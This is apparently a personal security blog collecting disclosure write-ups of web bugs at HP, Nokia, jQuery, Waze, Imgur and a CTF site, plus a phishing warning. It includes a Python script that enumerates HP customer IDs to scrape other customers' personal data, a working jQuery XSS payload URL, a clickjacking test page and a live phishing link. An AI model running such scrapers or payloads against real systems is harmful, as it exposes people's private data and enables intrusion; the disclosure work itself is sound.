Vulnerability in HP which leaked their users data

HI! all I am writing blog post really after a very long time . Sorry!

Well this is a bug story of HP (Hewlett-Packard) . I guess everyone know about them.

The Hewlett-Packard Company is an American global information technology company head quartered in Palo Alto, California, United States.

Few months back I purchased a Laptop of HP. After purchasing I had to register myself for warranty extensions and stuffs and those process were online. After completing my process they sent me an email regrading that , my order has been registered and all . So please download a certificate of that.

   (CLICK ON THE IMAGE TO ENLARGE IT :) )

Well ok!

On visiting the link I was sent to a page which asked me to click and generate my certificate.

Let do that :)

On doing that I was redirected to 

https://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:#USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid=30394780&provider=1

Now when I looked at the URL the parameter customerid looked interesting. Let change that and check what happens. Viola

So HP is exposing their customers
Name
Address
Product Serial No.
Product Number Product Description
HP Care Pack Serial Number

BAD RIGHT ?

Since ID what I got was somewhere 30394780 ... So I guess to many data getting exposed.

I wrote a simple python code for it

import re
import urllib2,sys
from bs4 import BeautifulSoup
id = 30394790
while (id < 30394850):
html = urllib2.urlopen("http://h30125.www3.hp.com/HPCSN/ELFOnline/elf_all_certificates.aspx?code=ELEM:34:%23USA&languageid=EN&salesordernumber=AP03919763&countrycode=IN&hidDateFormat=&usertypeis=&useridis=&selectedcategory=customer&customerid={id}&provider=1".format(id=id)).read()
soup = BeautifulSoup(html)
text = soup.get_text()
text2 = text.replace("\n", "")
text2 = text2.replace("  ", "\n")
text2 = text2.replace("\n", "") #meh was just trying to remove garbage whitespaces
id = id + 1
print "DATA OF  " + str(id) + "\n \n"
print text2

just checking users data from id 30394790 to id while 30394850

OUCH 

Conclusion everything is getting online and big companies are yet to be realize that their customers data is at risk. Making world wide reports on cyber security and yet themselves failing to protect their customers data is an irony.

And why leaking out these serial number and product id's are bad ? Read out this story how a pro social engineer ripped many big companies and one of his method included cracking the serial number pattern of a product.

http://kernelmag.dailydot.com/issue-sections/features-issue-sections/13930/social-engineering-scripts/

The Nokia browser Bug

Well I have been quite INACTIVE from a long time. Due to failing in exams, had to leave everything and open my book. Well here is an old Nokia browser bug (for Symbian) which was declared as wont fix by Nokia.

Test device :- nokia 5233
vulnerable application :- Nokia browser 7.3.1.33

Everyone is quite well aware of clickjacking bugs.

If you don't then read it out.

https://www.owasp.org/index.php/Clickjacking

Most of the website owners use x-frame header option to avoid click jacking over their website. And this feature is supported by almost all browser.

As it can be seen in the above image Google uses x-frame-options. So if you try to open their website in an iframe...

The website wont load . But...

When the same thing

<html>
<head>
<title>Clickjack test page</title>
</head>
<body>
<p>Website is vulnerable to clickjacking!</p>
<iframe src="http://www.google.com" width="350" height="400"></iframe>
</body>
</html>
Was opened in a Nokia symbian browser

Buuhahahah. Kind of universal clickjacking .

Well opera browsers were not vulnerable :)

 I reported it on 21st march 2013

But they said they wont fix

There can be many reasons for not fixing. The best one I guess is they are busy manufacturing Lumia and Symbian are out of the game :D.
But they should have fixed it because clickjacking is quite harmful in some of the cases and is even used as a catalyst for crsf attacks. Suppose you are visiting an xyz website. And the bad website owner has found a csrf bug . He hides the payload in a frame inside his webpages. Sets the height and width of the frame to zero or changes the opacity to make it invisible and everything will go un-noticed. Even applicable for an xss bug . Executing xss and csrf inside an invisible frame  has least probability of suspicion rather than crafting the payload url and send mails or use your ninja S.E tricks to take over the victim.


Cheers :)
Sorry for a very late post :)

Jquery xss

Long time back I reported an xss in JQuery's website and few days back I noticed that it was fixed.

jQuery is a multi-browser JavaScript library designed to simplify the client-side scripting of HTML. It was released in January 2006 at BarCamp NYC by John Resig

http://jqueryui.com/themeroller/#ffDefault=%22/%3E%3Cscript%3Ealert%28/Xss:cyberboy/%29%3C/script%3E

 

waze arbitrary file upload

Waze is one of the world's largest community based traffic and navigation app which was acquired by Google June 11, 2013 . And Google opens up responsible disclosure for their acquired websites . So I thought of trying my hands over it.

While I was scrolling around the pages I found the waze wiki which allowed users to upload files :]

When I tried uploading a PHP file, the response was 

Files of the MIME type "application/x-php" are not allowed to be uploaded

Well so the website is filtering files type by checking the MIME type . So no use of uploading arbitrary files by extension spoofing ... HMMMMMM

Then again something stroke my mind . What  more MIME types are filtered?? 

So I tried uploading a SWF file. BINGOOOOO!!!!!

Swf files are not filtered >:)

So what bad I can do ??

Aaahhaahhh execute an Xss with a vulnerable swf file ;-)

Aweee yeahhh

Now they have fixed the bug :)

And they sent a 100$ reward for this :D and my name will be listed in their reward hall of fame :)

http://www.google.co.in/about/appsecurity/hall-of-fame/reward/

CHEERS
Shashank (@cyberboyIndia)

Imgur xss

Imgur is an online image hosting service founded by Alan Schaaf in 2009 in Athens, Ohio. Imgur describes itself as "the home to the web's most popular image content, curated in real time by a dedicated community through commenting, voting and sharing.
I spotted a cross site scripting vulnerability in http://imgur.com/ on 6 FEB 2013 .

I reported the issue to them on the very day I found it and the same day they replied. After 2-3 days the bug was fixed.

Cheers :)
Shashank

Don't get trapped

This just an awareness for my blog readers . Think of the bad time when you go to your nearest ATM and find out that your bank balance is NILL. Because someone (a bad guy) hacked your account and transferred all your HARD EARNED money. The thing is that if you get hacked its your mistake even !!!. Hacking is not a voodoo magic that someone twitches his wand and empties your bank account. They either exploit a flaw or make your fool and take away your credential from you only. One of such process is called PHISHING.

In Phishing what a bad guys simple does is create a fake login page which resembles the real login page of your bank website's customer login page but ITS HOSTED ON HIS OWN SERVER. So when you logging in such types of fake login pages the user name and password gets saved into his logs and thus he has all your passwords .

Today I got a mail by one of  such  bad guy.

 at first it might look a real mail from RESERVE BANK OF INDIA . You can see the email is from no-reply@rbi.org.in . But actually it not so. The email system we used today has a flaw that allows anyone to send mail with anyone address. That is called email spoofing . That I will discuss some other day . And you might notice there is a link .
when I opened the link it got redirected to

http://www.classic-gallery.ru/images/smilies/RBI-EDITED/RBI-EDITED/RBI/index.htm

and when clicked over any banks link . It will ask you your bank user id and password .

But if you actually see the link. The login mechanism is being served from http://www.classic-gallery.ru
A Russian domain !!! which is in no way associated to RBI  or any other INDIAN bank. So NEVER EVERY TRY TO LOGIN TO THESE TYPES OF FAKE PAGES.

So the best way to avoid your self  from getting hacked is to  check the URL bar before logging in . And be sure to check that ITS YOUR BANK WEBSITE in which you are logging in not any other.

Capture the Xss

Every one is aware of the CTF and many of you might have been or still are active warriors of CTF. I spotted one XSS in their blog and they fixed it the very day .

It was just a random hit as I was reading their blog and then observed the old version of the plupload file  which had a know xss bug .

This what actually happens when you get the bad habit of xssing every where :P

Anyways they were happy and even  I am :)

Cheers :)